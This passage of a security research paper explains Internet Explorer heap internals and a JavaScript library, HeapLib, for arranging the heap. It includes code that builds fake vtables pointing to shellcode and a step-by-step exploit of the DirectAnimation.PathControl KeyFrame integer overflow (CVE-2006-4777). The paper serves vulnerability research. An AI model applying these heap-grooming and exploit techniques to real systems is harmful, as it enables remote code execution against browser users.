It should n't come as a surprise that the exploit is not always successful .
The second problem is the trade - off between the reliability of an exploit and the amount of system memory consumed by heap spraying .
If an exploit fills the entire address space of the browser with shellcode , any random jump would be exploitable .
Unfortunately , on systems with insufficient physical memory , heap spraying will result in heavy use of the paging file and slow system performance .
If the user closes the browser before the heap spraying is complete , the exploit will fail .
This paper presents a solution to both of these problems , making reliable and precise exploitation possible .
Internet Explorer heap internals
Overview
There are three main components of Internet Explorer that allocate memory typically corrupted by browser heap vulnerabilities .
The first one is the MSHTML.DLL library , responsible for managing memory for HTML elements on the currently displayed page .
It allocates memory during the initial rendering of the page , and during any subsequent DHTML manipulations .
The memory is allocated from the default process heap and is freed when a page is closed or HTML elements are destroyed .
The second component that manages memory is the JavaScript engine in JSCRIPT .DLL .
Memory for new JavaScript objects is allocated from a dedicated JavaScript heap , with the exception of strings , which are allocated from the default process heap .
Unreferenced objects are destroyed by the garbage collector , which runs when the total memory consumption or the number of objects exceed a certain threshold .
The garbage collector can also be triggered explicitly by calling the CollectGarbage ( ) function .
The final component in most browser exploits is the ActiveX control that causes heap corruption .
Some ActiveX controls use a dedicated heap , but most allocate and corrupt memory on the default process heap .
An important observation is that all three components of Internet Explorer use the same default process heap .
This means that allocating and freeing memory with JavaScript changes the layout of the heap used by MSHTML and ActiveX controls , and a heap corruption bug in an ActiveX control can be used to overwrite memory allocated by the other two browser components .
JavaScript strings
The JavaScript engine allocates most of its memory with the MSVCRT malloc ( ) and new ( ) functions , using a dedicated heap created during CRT initialization .
One important exception is the data for JavaScript strings .
They are stored as BSTR strings , a basic string type used by the COM interface .
Their memory is allocated from the default process heap by the SysAllocString family of functions in OLEAUT32.DLL .
Here is a typical backtrace from a string allocation in JavaScript :
ChildEBP RetAddr Args to Child 0013d26 c 77124b52 77606034 00002000 00037f48 ntdll!RtlAllocateHeap+0xeac
0013d280 77124c7 f 00002000 00000000 0013d2a8 OLEAUT32 !APP_DATA::AllocCachedMem+0x4f 0013d290 75c61dd0 00000000 00184350 00000000 OLEAUT32!SysAllocStringByteLen+0x2e 0013d2a8 75caa763 00001ffa 0013d660 00037090 jscript!PvarAllocBstrByteLen+0x2e 0013d31c 75caa810 00037940 00038178 0013d660 jscript!JsStrSubstrCore+0x17a 0013d33 c 75c6212e 00037940 0013d4a8 0013d660 jscript!JsStrSubstr+0x1b 0013d374 75c558e1 0013d660 00000002 00038988 jscript!NatFncObj::Call+0x41
0013d408 75c5586e 00037940 00000000 00000003 jscript!NameTbl::InvokeInternal+0x218 0013d434 75c62296 00037940 00000000 00000003 jscript!VAR::InvokeByDispID+0xd4
0013d478 75c556c5 00037940 0013d498 00000003 jscript!VAR::InvokeByName+0x164 0013d4b8 75c54468 00037940 00000003 0013d660 jscript!VAR::InvokeDispName+0x43 0013d4dc 75c54d1a 00037940 00000000 00000003 jscript!VAR::InvokeByDispID+0xfb
0013d6d0 75c544fa 0013da80 00000000 0013d7ec jscript!CScriptRuntime:: Run+0x18fb
To allocate a new string on the heap , we need to create a new JavaScript string object .
We cannot simply assign string literal to a new variable , because this does not create a copy of the string data .
Instead , we need to concatenate two strings or use the substr function .
For example :
var str1 = " AAAAAAAAAAAAAAAAAAAA " ; // does n't allocate a new string var str2 = str1.substr(0 , 10 ) ; // allocates a new 10 character string var str3 = str1 + str2 ; // allocates a new 30 character string
BSTR strings are stored in memory as a structure containing a four - byte size field , followed by the string data as 16 - bit wide characters , and a 16 - bit null terminator .
The str1 string from the example above will have the following representation in memory :
string size | string data | null terminator 4 bytes | length / 2 bytes | 2 bytes | | 14 00 00 00 | 41 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 41 00 | 00 00
We can use the following two formulas to calculate how many bytes will be allocated for a string , or how long a string must be to allocate a certain number of bytes :
bytes = len * 2 + 6 len = ( bytes - 6 ) / 2
The way strings are stored allows us to write a function that allocates a memory block of an arbitrary size by allocating a new string .
The code will calculate the required string length using the len = ( bytes - 6 ) / 2 formula , and call substr to allocate a new string of that length .
The string will contain data copied from the padding string .
If we want to put specific data into the new memory block , we just need to initialize the padding string with it beforehand .
// Build a long string with padding data padding = " AAAA " while ( padding.length < MAX_ALLOCATION_LENGTH ) padding = padding + padding ; //
Allocate a memory block of a specified size in bytes function alloc ( bytes ) { return padding .
substr ( 0 , ( bytes - 6 ) /2 ) ; }
Garbage collection
To manipulate the browser heap layout it is not enough to be able to allocate memory blocks of an arbitrary size , we also need a way to free them .
The JavaScript runtime uses a simple mark - and - sweep garbage collector , the most detailed description of which is in a post on Eric Lippert 's blog .
Garbage collection is triggered by various heuristics , such as the number of objects created since the last run .
The mark - and - sweep algorithm identifies all unreferenced objects in the JavaScript runtime and destroys them .
When a string object is destroyed , its data is freed by calling SysFreeString in OLEAUT32.DLL .
This is a backtrace from the garbage collector :
ChildEBP RetAddr Args to Child 0013d324 774fd004 00150000 00000000 001bae28 ntdll!RtlFreeHeap 0013d338 77124ac8 77606034 001bae28 00000008 ole32!CRetailMalloc_Free+0x1c
0013d358 77124885 00000006 00008000 00037f48 OLEAUT32 !APP_DATA::FreeCachedMem+0xa0 0013d36 c 77124ae3 02a8004c 00037cc8 00037f48 OLEAUT32!SysFreeString+0x56
0013d380 75c60f15 00037f48 00037f48 75c61347 OLEAUT32!VariantClear+0xbb 0013d38c 75c61347 00037cc8 000378a0 00036d40 jscript!VAR ::Clear+0x5d 0013d3b0 75c60eba 000378b0 00000000 000378a0 jscript!GcAlloc::ReclaimGarbage+0x65 0013d3cc 75c61273 00000002 0013d40 c 00037c10 jscript!GcContext::Reclaim+0x98
0013d3e0 75c99a27 75c6212e 00037940 0013d474 jscript!GcContext::Collect+0xa5 0013d3e4 75c6212e 00037940 0013d474 0013d40c jscript!JsCollectGarbage+0x10
To free one of the strings we 've allocated , we need to delete all references to it and run the garbage collector .
Fortunately , we do n't have to wait for one of the heuristics to trigger it , because the JavaScript implementation in Internet Explorer provides a CollectGarbage ( ) function which forces the garbage collector to run immediately .
The use of this function is shown in the code below :
var str ; //
We need to do the allocation and free in a function scope , otherwise the // garbage collector will not free the string .
function alloc_str ( bytes ) { str = padding .
substr( 0 , ( bytes - 6 ) /2 ) ; } function free_str ( ) { str = null ; CollectGarbage ( ) ; } alloc_str ( 0x10000 ) ; // allocate memory block free_str ( ) ; // free memory block
The code above allocates a 64KB memory block and frees it , demonstrating our ability to perform arbitrary allocations and frees on the default process heap .
We can free only blocks that were allocated by us , but even with that restriction we still have a great degree of control over the heap layout .
OLEAUT32 memory allocator
Unfortunately , it turns out that a call to SysAllocString does n't always result in an allocation from the system heap .
The functions for allocating and freeing BSTR strings use a custom memory allocator , implemented in the APP_DATA class in OLEAUT32 .
This memory allocator maintains a cache of freed memory blocks , and reuses them for future allocations .
This is similar to the lookaside lists maintained by the system memory allocator .
The cache consists of 4 bins , each holding 6 blocks of a certain size range .
When a block is freed with the APP_DATA :: FreeCachedMem ( ) function , it is stored in one of the bins .
If the bin is full , the smallest block in the bin is freed with HeapFree ( ) and is replaced with the new block .
Blocks larger than 32767 bytes are not cached and are always freed directly .
When APP_DATA :: AllocCachedMem ( ) is called to allocate memory , it looks for a free block in the appropriate size bin .
If a large enough block is found , it is removed from the cache and returned to the caller .
Otherwise the function allocates new memory with HeapAlloc ( ) .
The decompiled code of the memory allocator is shown below :
// Each entry in the cache has a size and a pointer to the free block struct CacheEntry { unsigned int size ; void * ptr ; } //
The cache consists of 4 bins , each holding 6 blocks of a certain size range class APP_DATA { CacheEntry bin_1_32 [ 6 ] ; // blocks from 1 to 32 bytes CacheEntry bin_33_64 [ 6 ] ; // blocks from 33 to 64 bytes CacheEntry bin_65_256 [ 6 ] ; // blocks from 65 to 265 bytes CacheEntry bin_257_32768[6 ] ; // blocks from 257 to 32768 bytes void * AllocCachedMem( unsigned long size ) ; // alloc function void FreeCachedMem( void* ptr ) ; // free function } ; // //
Allocate memory , reusing the blocks from the cache // void * APP_DATA :: AllocCachedMem( unsigned long size ) { CacheEntry * bin ; int i ; if ( g_fDebNoCache == TRUE ) goto system_alloc ; // Use HeapAlloc if caching is disabled //
Find the right cache bin for the block size if ( size > 256 ) bin = & this -> bin_257_32768 ; else if ( size > 64 ) bin = & this -> bin_65_256 ; else if ( size > 32 ) bin = & this -> bin_33_64 ; else bin = & this -> bin_1_32 ; // Iterate through all entries in the bin for ( i = 0 ; i < 6 ; i++) { //
If the cached block is big enough , use it for this allocation if ( bin [ i ] .size >= size ) { bin [ i] .size = 0 ; // Size 0 means the cache entry is unused return bin [ i ] . ptr ; } } system_alloc : // Allocate memory using the system memory allocator return HeapAlloc( GetProcessHeap ( ) , 0 , size ) ; } // //
Free memory and keep freed blocks in the cache // void APP_DATA :: FreeCachedMem( void* ptr ) { CacheEntry * bin ; CacheEntry * entry ; unsigned int min_size ; int i ; if ( g_fDebNoCache == TRUE ) goto system_free ; // Use HeapFree if caching is disabled //
Get the size of the block we 're freeing size = HeapSize( GetProcessHeap ( ) , 0 , ptr ) ; //
Find the right cache bin for the size if ( size > 32768 ) goto system_free ; // Use HeapFree for large blocks else if ( size > 256 ) bin = & this -> bin_257_32768 ; else if ( size > 64 ) bin = & this -> bin_65_256 ; else if ( size > 32 ) bin = & this -> bin_33_64 ; else bin = & this -> bin_1_32 ; // Iterate through all entries in the bin and find the smallest one min_size = size ; entry = NULL ; for ( i = 0 ; i < 6 ; i++) { //
If we find an unused cache entry , put the block there and return if ( bin [ i ] . size == 0 ) { bin [ i ] . size = size ; bin [ i ] . ptr = ptr ; //
The free block is now in the cache return ; } //
If the block we 're freeing is already in the cache , abort if ( bin [ i ] .ptr == ptr ) return ; //
Find the smallest cache entry if ( bin [ i ] .size < min_size ) { min_size = bin [ i ] . size ; entry = & bin [ i ] ; } } //
If the smallest cache entry is smaller than our block , free the cached // block with HeapFree and replace it with the new block if ( min_size < size ) { HeapFree( GetProcessHeap ( ) , 0 , entry -> ptr ) ; entry -> size = size ; entry -> ptr = ptr ; return ; } system_free : // Free the block using the system memory allocator return HeapFree( GetProcessHeap ( ) , 0 , ptr ) ; }
The caching alrogithm used by the APP_DATA memory allocator presents a problem , because only some of our allocations and frees result in calls to the system allocator .
Plunger technique
To make sure that each string allocation comes from the system heap , we need to allocate 6 blocks of the maximum size for each bin .
Since the cache can hold only 6 blocks in a bin , this will make sure that all cache bins are empty .
The next string allocation is guaranteed to result in a call to HeapAlloc ( ) .
If we free the string we just allocated , it will go into one of the cache bins .
We can flush it out of the cache by freeing the 6 maximum - size blocks that we allocated in the previous step .
The FreeCachedMem ( ) function will push all smaller blocks out of the cache , and our string will be freed with HeapFree ( ) .
At this point , the cache will be full , so we need to empty it again by allocating 6 maximum - size blocks for each bin .
In effect , we are using the 6 blocks as a plunger to push out all smaller blocks out of the cache , and then we pull the plunger out by allocating the 6 blocks again .
The following code shows an implementation of the plunger technique :
plunger = new Array ( ) ; //
This function flushes out all blocks in the cache and leaves it empty function flushCache ( ) { //
Free all blocks in the plunger array to push all smaller blocks out plunger = null ; CollectGarbage ( ) ; //
Allocate 6 maximum size blocks from each bin and leave the cache empty plunger = new Array ( ) ; for ( i = 0 ; i < 6 ; i++) { plunger.push ( alloc ( 32 ) ) ; plunger.push( alloc ( 64 ) ) ; plunger.push ( alloc( 256 ) ) ; plunger.push ( alloc ( 32768 ) ) ; } } flushCache ( ) ; //
Flush the cache before doing any allocations alloc_str ( 0x200 ) ; // Allocate the string free_str ( ) ; //
Free the string and flush the cache flushCache ( ) ;
To push a block out of the cache and free it with HeapFree ( ) , it must be smaller than the maximum size for its bin .
Otherwise , the condition min_size < size in FreeCachedMem will not be satisfied and the plunger block will be freed instead .
This means that we cannot free blocks of size 32 , 64 , 256 or 32768 , but this is not a serious limitation .
HeapLib - JavaScript heap manipulation library
We implemented the concepts described in the previous section in a JavaScript library called HeapLib .
It provides alloc ( ) and free ( ) functions that map directly to calls to the system allocator , as well as a number of higher level heap manipulation routines .
The Hello World of HeapLib
The most basic program utilizing the HeapLib library is shown below :
< script type =" text / javascript " src=" heapLib.js " ></ script > < script type =" text / javascript " > //
Create a heapLib object for Internet Explorer var heap = new heapLib.ie ( ) ; heap.gc( ) ; //
Run the garbage collector before doing any allocations // Allocate 512 bytes of memory and fill it with padding heap.alloc( 512 ) ; //
Allocate a new block of memory for the string " AAAAA " and tag the block with " foo " heap.alloc ( " AAAAA " , " foo " ) ; //
Free all blocks tagged with " foo " heap .
free ( " foo " ) ; </ script >
This program allocates a 16 byte block of memory and copies the string " AAAAA " into it .
The block is tagged with the tag " foo " , which is later used as an argument to free ( ) .
The free ( ) function frees all memory blocks marked with this tag .
In terms of its effect on the heap , the Hello World program is equivalent to the following C code :
block1 = HeapAlloc( GetProcessHeap ( ) , 0 , 512 ) ; block2 = HeapAlloc( GetProcessHeap ( ) , 0 , 16 ) ; HeapFree( GetProcessHeap( ) , 0 , block2 ) ;
Debugging
HeapLib provides a number of functions that can be used to debug the library and inspect its effect on the heap .
This is small example that illustrates the debugging functionality :
heap.debug ( " Hello ! " ) ; // output a debugging message heap.debugHeap( true ) ; // enable tracing of heap allocations heap.alloc ( 128 , " foo " ) ; heap.debugBreak( ) ; // break in WinDbg heap . free ( " foo " ) ; heap.debugHeap( false ) ; // disable tracing of heap allocations
To see the debugging output , attach WinDbg to the IEXPLORE.EXE process and set the following breakpoints :
bc * bu 7c9106eb " j ( poi( esp+4)==0x150000 ) '. printf \ " alloc ( 0x %x ) = 0x %x\ " , poi( esp+c ) , eax ; .echo ; g ' ; ' g ' ; " bu ntdll !
RtlFreeHeap " j ( ( poi( esp+4)==0x150000 ) & ( poi(esp+c ) !=0 ) ) '. printf \ " free ( 0x %x ) , size=0x %x\ " , poi( esp+c ) , wo ( poi( esp + c ) - 8 ) * 8 - 8 ; .echo ; g' ; ' g ' ; " bu jscript !
JsAtan2 " j ( poi( poi( esp+14 ) +18 ) == babe ) '. printf \" DEBUG : % mu\ " , poi( poi( poi( esp+14 ) + 8) +8 ) ; .echo ; g' ; " bu jscript !
JsAtan " j ( poi( poi( esp+14 ) +8 ) == babe ) '.echo DEBUG : Enabling heap breakpoints ; be 0 1 ; g ' ; " bu jscript !
JsAsin " j ( poi( poi( esp+14 ) +8 ) == babe ) '.echo DEBUG : Disabling heap breakpoints ; bd 0 1 ; g ' ; " bu jscript !
JsAcos " j ( poi( poi( esp+14 ) +8 ) == babe ) '.echo DEBUG : heapLib breakpoint ' " bd 0 1 g
The first breakpoint is at the RET instruction of ntdll !
RtlAllocateHeap .
The address above is valid for Windows XP SP2 , but might need adjustment for other systems .
The breakpoints also assume that the default process heap is at 0x150000 .
WinDbg 's uf and ! peb commands provide these addresses :
0:012 > uf ntdll!RtlAllocateHeap ... ntdll!RtlAllocateHeap+0xea7 : 7c9106e6 e817e7 ffff call ntdll!_SEH_epilog ( 7c90ee02 ) 7c9106eb c20c00 ret 0Ch 0:012 > ! peb PEB at 7ffdf000 ...
ProcessHeap : 00150000
After setting these breakpoints , running the sample code above will display the following debugging output in WinDbg :
DEBUG : Hello !
DEBUG : Enabling heap breakpoints alloc( 0x80 ) = 0x1e0b48 DEBUG : heapLib breakpoint eax=00000001 ebx=0003e660 ecx=0003e67c edx=00038620 esi=0003e660 edi=0013dc90 eip=75ca315f esp=0013dc6 c ebp=0013dca0 iopl=0 nv up ei ng nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000296 jscript!JsAcos : 75ca315 f 8 bff mov edi , edi 0:000 > g DEBUG : Flushing the OLEAUT32 cache free ( 0x1e0b48 ) , size=0x80 DEBUG : Disabling heap breakpoints
We can see that the alloc ( ) function allocated 0x80 bytes of memory at address 0x1e0b48 , which was later freed by free ( ) .
The sample program also triggers a breakpoint in WinDbg by calling debugBreak ( ) from HeapLib .
This function is implemented as a call to the JavaScript acos ( ) function with a special parameter , which triggers the WinDbg breakpoint on jscript !
JsAcos .
This gives us the opportunity to inspect the state of the heap before continuing with the JavaScript execution .
Utility functions
The library also provides functions for manipulating data used in exploitation .
Here 's an example of using the addr ( ) and padding ( ) functions to prepare a fake vtable block :
var vtable = " " ; for ( var i = 0 ; i < 100 ; i++ ) { //
Add 100 copies of the address 0x0C0C0C0C to the vtable vtable = vtable + heap.addr(0x0C0C0C0C ) ; } // Pad the vtable with " A " characters to make the block size exactly 1008 bytes vtable = vtable + heap.padding (( 1008 - ( vtable.length *2+6 ) ) /2 ) ;
For more details , see the description of the functions in the next section .
HeapLib reference
Object - oriented interface
The HeapLib API is implemented as an object - oriented interface .
To use the API in Internet Explorer , create an instance of the heapLib.ie class .
Constructor Description heapLib.ie( maxAlloc , heapBase ) Creates a new heapLib API object for Internet Explorer .
The maxAlloc argument sets the maximum block size that can be allocated using the alloc ( ) function .
maxAlloc - maximum allocation size in bytes ( defaults to 65535 )
heapBase - base of the default process heap ( defaults to 0x150000 ) Arguments :
All functions described below are instance methods of the heapLib.ie class .
Debugging
To see the debugging output , attach WinDbg to the IEXPLORE.EXE process and set the breakpoints described above .
If the debugger is not present , the functions below have no effect .
Function Description debug( msg )
Outputs a debugging message in WinDbg .
The msg argument must be a string literal .
Using string concatenation to build the message will result in heap allocations .
msg - string to output Arguments : debugHeap ( enable )
Enables or disables logging of heap operations in WinDbg. enable - a boolean value , set to true to enable heap logging Arguments : debugBreak ( )
Triggers a breakpoint in the debugger .
Utility functions
Function Description padding ( len )
Returns a string of a specified length , up to the maximum allocation size set in the heapLib.ie constructor .
The string contains " A " characters .
len - length in characters
Arguments : heap.padding (5 ) // returns " AAAAA " Example : round ( num , round )
Returns an integer rounded up to a specified value .
num - integer to round
round - value to round to Arguments : heap.round ( 210 , 16 ) // returns 224 Example : hex ( num , width )
Converts an integer to a hex string .
This function uses the heap .
num - integer to convert
width - pad the output with zeroes to a specified width ( optional ) Arguments : heap .hex ( 210 , 8 ) // returns " 000000D2 " Example : addr ( addr ) Converts a 32 - bit address to a 4 - byte string with the same representation in memory .
This function uses the heap .
addr - integer representation of the address Arguments : heap.addr(0x1523D200 ) // returns the equivalent of // unescape ( " %uD200%u1523 " )
Example :
Memory allocation
Function Description alloc( arg , tag )
Allocates a block of a specified size with the system memory allocator .
A call to this function is equivalent to a call to HeapAlloc ( ) .
If the first argument is a number , it specifies the size of the new block , which is filled with " A " characters .
If the argument is a string , its data is copied into a new block of size arg .
length * 2 + 6 .
In both cases the size of the new block must be a multiple of 16 and not equal to 32 , 64 , 256 or 32768 .
arg - size of the memory block in bytes , or a string to strdup
tag - a tag identifying the memory block ( optional ) Arguments : heap.alloc ( 512 , " foo " ) // allocates a 512 byte block tagged with // " foo " and fills it with " A " characters heap.alloc ( " BBBBB " ) // allocates a 16 byte block with no tag // and copies the string " BBBBB " into it Example : free ( tag )
Frees all memory blocks marked with a specific tag with the system memory allocator .
A call to this function is equivalent to a call to HeapFree ( ) .
tag - a tag identifying the group of blocks to be freed Arguments : heap .
free ( " foo " ) // free all memory blocks tagged with " foo " Example : gc ( )
Runs the garbage collector and flushes the OLEAUT32 cache .
Call this function before before using alloc ( ) and free ( ) .
Heap manipulation
The following functions are used for manipulating the data structures of the memory allocator in Windows 2000 , XP and 2003 .
The heap allocator in Windows Vista is not supported , due to its significant differences .
Function Description freeList ( arg , count )
Adds blocks of the specified size to the free list and makes sure they are not coalesced .
The heap must be defragmented before calling this function .
If the size of the memory blocks is less than 1024 , you have to make sure that the lookaside is full .
arg - size of the new block in bytes , or a string to strdup
count - how many free blocks to add to the list ( defaults to 1 ) heap.freeList ( " BBBBB " , 5 ) // adds 5 blocks containing the // string " BBBBB " to the free list Example : Arguments : lookaside ( )
Adds blocks of the specified size to the lookaside .
The lookaside must be empty before calling this function .
arg - size of the new block in bytes , or a string to strdup
count - how many blocks to add to the lookaside ( defaults to 1 ) heap.lookaside ( " BBBBB " , 5 ) // puts 5 blocks containing the // string " BBBBB " on the lookaside Example : Arguments : lookasideAddr ( )
Return the address of the head of the lookaside linked list for blocks of a specified size .
Uses the heapBase parameter from the heapLib.ie constructor .
arg - size of the new block in bytes , or a string to strdup heap.lookasideAddr( " BBBBB " ) // returns 0x150718 Example : Arguments : vtable ( shellcode , jmpecx , size )
Returns a fake vtable that contains shellcode .
The caller should free the vtable to the lookaside and use the address of the lookaside head as an object pointer .
When the vtable is used , the address of the object must be in eax and the pointer to the vtable must be in ecx .
Any virtual function call through the vtable from ecx+8 to ecx+0x80 will result in shellcode execution .
This function uses the heap .
shellcode - shellcode string
jmpecx - address of a jmp ecx or equivalent instruction
size - size of the vtable to generate ( defaults to 1008 bytes ) heap.vtable ( shellcode , 0x4058b5 ) // generates a 1008 byte vtable // with pointers to shellcode Example : Arguments :
Using HeapLib
Defragmenting the heap
Heap fragmentation is a serious problem for exploitation .
If the heap starts out empty the heap allocator 's determinism allows us to compute the heap state resulting from a specific sequence of allocations .
Unfortunately , we do n't know the heap state when our exploit is executed , and this makes the behavior of the heap allocator unpredictable .
To deal with this problem , we need to defragment the heap .
This can be accomplished by allocating a large number of blocks of the size that our exploit will use .
These blocks will fill all available holes on the heap and guarantee that any subsequent allocations for blocks of the same size are allocated from the end of the heap .
At this point the behavior of the allocator will be equivalent to starting with an empty heap .
The following code will defragment the heap with blocks of size 0x2010 bytes :
for ( var i = 0 ; i < 1000 ; i++) heap.alloc( 0x2010 ) ;
Putting blocks on the free list
Assume that we have a piece of code that allocates a block of memory from the heap and uses it without initialization .
If we control the data in the block , we 'll be able to exploit this vulnerability .
We need to allocate a block of the same size , fill it with our data , and free it .
The next allocation for this size will get the block containing our data .
The only obstacle is the coalescing algorithm in the system memory allocator .
If the block we 're freeing is next to another free block , they will get coalesced into a bigger block , and the next allocation might not get a block containing our data .
To prevent this , we will allocate three blocks of the same size , and free the middle one .
Defragmenting the heap beforehand will ensure that the three blocks are consecutive , and the middle block will not get coalesced .
heap.alloc(0x2020 ) ; // allocate three consecutive blocks heap.alloc( 0x2020 , " freeList " ) ; heap.alloc( 0x2020 ) ; heap. free ( " freeList " ) ; // free the middle block
The HeapLib library provides a convenience function that implements the technique described above .
The following example shows how to add 0x2020 byte block to the free list :
heap.freeList(0x2020 ) ;
Emptying the lookaside
To empty the lookaside list for a certain size , we just need to allocate enough blocks of that size .
Usually the lookaside will contain no more than 4 blocks , but we 've seen lookasides with more entries on XP SP2 .
We 'll allocate 100 blocks , just to be sure .
The following code shows this :
for ( var i = 0 ; i < 100 ; i++) heap.alloc( 0x100 ) ;
Freeing to the lookaside
Once the lookaside is empty , any block of the right size will be put on the lookaside when we free it .
// Empty the lookaside for ( var i = 0 ; i < 100 ; i++) heap.alloc( 0x100 ) ; // Allocate a block heap.alloc( 0x100 , " foo " ) ; //
Free it to the lookaside heap .
free ( " foo " ) ;
The lookaside ( ) function in HeapLib implements this technique :
// Empty the lookaside for ( var i = 0 ; i < 100 ; i++) heap.alloc( 0x100 ) ; // Add 3 blocks to the lookaside heap.lookaside ( 0x100 ) ;
Using the lookaside for object pointer exploitation
It is interesting to follow what happens when a block is put on the lookaside .
Let 's start with an empty lookaside list .
If the base of the heap is 0x150000 , the address of the lookaside head for blocks of size 1008 will be 0x151e58 .
Since the lookaside is empty , this location will contain a NULL pointer .
Now let 's free a 1008 byte block .
The lookaside head at 0x151e58 will point to it , and the first four bytes of the block will be overwritten with a NULL to indicate the end of the linked list .
The structure in memory looks just like what we need to exploit an overwritten object pointer :
object pointer --> lookaside --> freed block ( fake object ) ( fake vtable ) addr : xxxx addr : 0x151e58 addr : yyyy data : 0x151e58 data : yyyy data : +0 NULL +4 function pointer +8 function pointer ...
If we overwrite an object pointer with 0x151e58 and free a 1008 byte block containing a fake vtable , any virtual function call through the vtable will jump to a location of our choosing .
The fake vtable can be built using the vtable ( ) function in the HeapLib library .
It takes a shellcode string and an address of a jmp ecx trampoline as arguments and allocates a 1008 byte block with the following data :
string length jmp +124 addr of jmp ecx sub [ eax ] , al * 2 shellcode null terminator 4 bytes 4 bytes 124 bytes 4 bytes x bytes 2 bytes
The caller should free the vtable to the lookaside and overwrite an object pointer with the address of the lookaside head .
The fake vtable is designed to exploit virtual function calls where the object pointer is in eax and the vtable address in ecx :
mov ecx , dword ptr [ eax ] ; get the vtable address push eax ; pass C++ this pointer as the first argument call dword ptr [ ecx+08 h ] ; call the function at offset 0x8 in the vtable
Any virtual function call from ecx+8 to ecx+0x80 will result in a call to the jmp ecx trampoline .
Since ecx points to the vtable , the trampoline will jump back to the beginning of the block .
Its first four bytes contain the string length when it's in use , but after it's freed to the lookaside , they are overwritten with NULL .
The four zero bytes are executed as two add [ eax ] , al instructions .
The execution reaches the jmp +124 instruction , which jumps over the function pointers and lands on the two sub [ eax ] , al instructions at offset 132 in the vtable .
These two instructions fix the memory corrupted earlier by the sub instructions , and finally the shellcode is executed .
Exploiting heap vulnerabilities with HeapLib
DirectAnimation .
PathControl KeyFrame vulnerability
As our first example we will use the integer overflow vulnerability in the DirectAnimation .
PathControl ActiveX control ( CVE - 2006-4777 ) .
This vulnerability is triggered by creating an ActiveX object and calling its KeyFrame ( ) method with a first argument larger than 0x07 ffffff .
The KeyFrame method is documented in the Microsoft DirectAnimation SDK as follows :
KeyFrame Method Specifies x- and y- coordinates along the path , and a time to reach each point .
The first point defines the path 's starting point .
This method can be used or modified only when the path is stopped .
Syntax KeyFrameArray = Array ( x1 , y1 , ... , xN , yN ) TimeFrameArray = Array ( time2 , ... , timeN ) pathObj.KeyFrame ( npoints , KeyFrameArray , TimeFrameArray )
Parameters npoints
Number of points to be used to define the path .
x1 , y1 , ... , xN , yN Set of x- and y- coordinates that identify the points along the path .
time2 , ... , timeN Respective times that the path takes to reach each of the respective points from the previous point .
KeyFrameArray
Array that contains the x- and y - coordinate definitions .
TimeFrameArray
Array that contains the time values between the points that define the path , starting at the x1 and y1 point through xN and yN points ( the last set of points in the path ) .
The path begins at point x1 and y1 with a time value of 0 .
The following JavaScript code will trigger the vulnerability :
var target = new ActiveXObject ( " DirectAnimation . PathControl " ) ; target .
KeyFrame ( 0x7 fffffff , new Array ( 1 ) , new Array ( 1 ) ) ;
Vulnerable code
The vulnerability is in the CPathCtl : : KeyFrame function in DAXCTLE.OCX .
The decompiled code of the function is shows below :
long __stdcall CPathCtl :: KeyFrame( unsigned int npoints , struct tagVARIANT KeyFrameArray , struct tagVARIANT TimeFrameArray ) { int err = 0 ; ... //
The new operator is a wrapper around CMemManager : : AllocBuffer .
If the // size size is less than 0x2000 , it allocates a block from a special // CMemManager heap , otherwise it is equivalent to : // // HeapAlloc( GetProcessHeap ( ) , HEAP_ZERO_MEMORY , size +8 ) + 8 buf_1 = new ( ( npoints * 2 ) * 8 ) ; buf _2 = new ( ( npoints - 1) * 8 ) ; KeyFrameArray.field_C = new ( npoints * 4 ) ; TimeFrameArray.field_C = new ( npoints * 4 ) ; if ( buf _1 == NULL || buf_2 == NULL || KeyFrameArray.field_C == NULL || TimeFrameArray.field_C == NULL ) { err = E_OUTOFMEMORY ; goto cleanup ; } //
We set an error and go to the cleanup code if the KeyFrameArray array // is smaller than npoints * 2 or TimeFrameArray is smaller than npoints - 1 if ( KeyFrameArrayAccessor.ToDoubleArray( npoints * 2 , buf_1 ) < 0 || TimeFrameArrayAccessor.ToDoubleArray( npoints -1 , buf_2 ) < 0 ) { err = E_FAIL ; goto cleanup ; } ... cleanup : if ( npoints > 0 ) //
We iterate from 0 to npoints and call a virtual function on all // non-NULL elements of KeyFrameArray -> field_C and TimeFrameArray -> field_C for ( i = 0 ; i < npoints ; i++) { if ( KeyFrameArray.field_C[i ] != NULL ) KeyFrameArray.field_C[i]->func_8 ( ) ; if ( TimeFrameArray.field_C[i ] != NULL ) TimeFrameArray.field_C[i]->func_8 ( ) ; } } ... return err ; }
The KeyFrame function multiplies the npoints argument by 16 , 8 and 4 and allocates four buffers .
If npoints is greater than 0x40000000 the allocation size will wrap around and the function will allocate four small buffers .
In our exploit , we 'll set npoints to 0x40000801 , and the function will allocate buffers of size 0x8018 , 0x4008 and two of size 0x200c .
We want the smallest buffer to be larger than 0x2000 bytes because smaller allocations will come from the CMemManager heap instead of the system allocator .
After allocating the buffers , the function calls CSafeArrayOfDoublesAccessor :: ToDoubleArray ( ) to initialize the array accessor objects .
If the size of KeyFrameArray is less than npoints , ToDoubleArray will return E_INVALIDARG .
The cleanup code executed in this case will iterate through the two 0x2004 byte buffers and call a virtual function on each non-NULL element in the buffer .
These buffers are allocated with the HEAP_ZERO_MEMORY flag and contain only NULL pointers .
The code will iterate from 0 to npoints ( which is 0x40000801 ) , however , and will eventually access data past the end of the 0x200c byte buffers .
If we control the first dword after the KeyFrameArray .
field _C buffer , we can point it to a fake object with a pointer to the shellcode in its vtable .
The virtual function call to func_8 ( ) will execute our shellcode .
Exploit
To exploit this vulnerability , we need to control the first four bytes after the 0x200c byte buffer .
First , we will defragment the heap with blocks of size 0x2010 ( the memory allocator rounds all sizes to 8 , so 0x200 c gets rounded up to 0x2010 ) .
Then we will allocate two 0x2020 byte memory blocks , write the fake object pointer at offset 0x200c , and free them to the free list .
When the KeyFrame function allocates two 0x200c byte buffers , the memory allocator will reuse our 0x2020 byte blocks , zeroing only the first 0x200c bytes .
The cleanup loop at the end of the KeyFrame function will reach the fake object pointer at offset 0x200c and will call a function through its virtual table .
The fake object pointer points to 0x151e58 , which is the head of the lookaside list for blocks of size 1008 .
The only entry on the list is our fake vtable .
The code that calls the virtual function is :
.text :100071E4 mov eax , [ eax ] ; object pointer . text : 100071E6 mov ecx , [ eax ] ; vtable .text :100071E8 push eax . text : 100071E9 call dword ptr [ ecx+8 ]
The virtual call is through ecx+8 , and it transfers execution to a jmp ecx trampoline in IEXPLORE .EXE .
The trampoline jumps back to the beginning of the vtable and executes the shellcode .
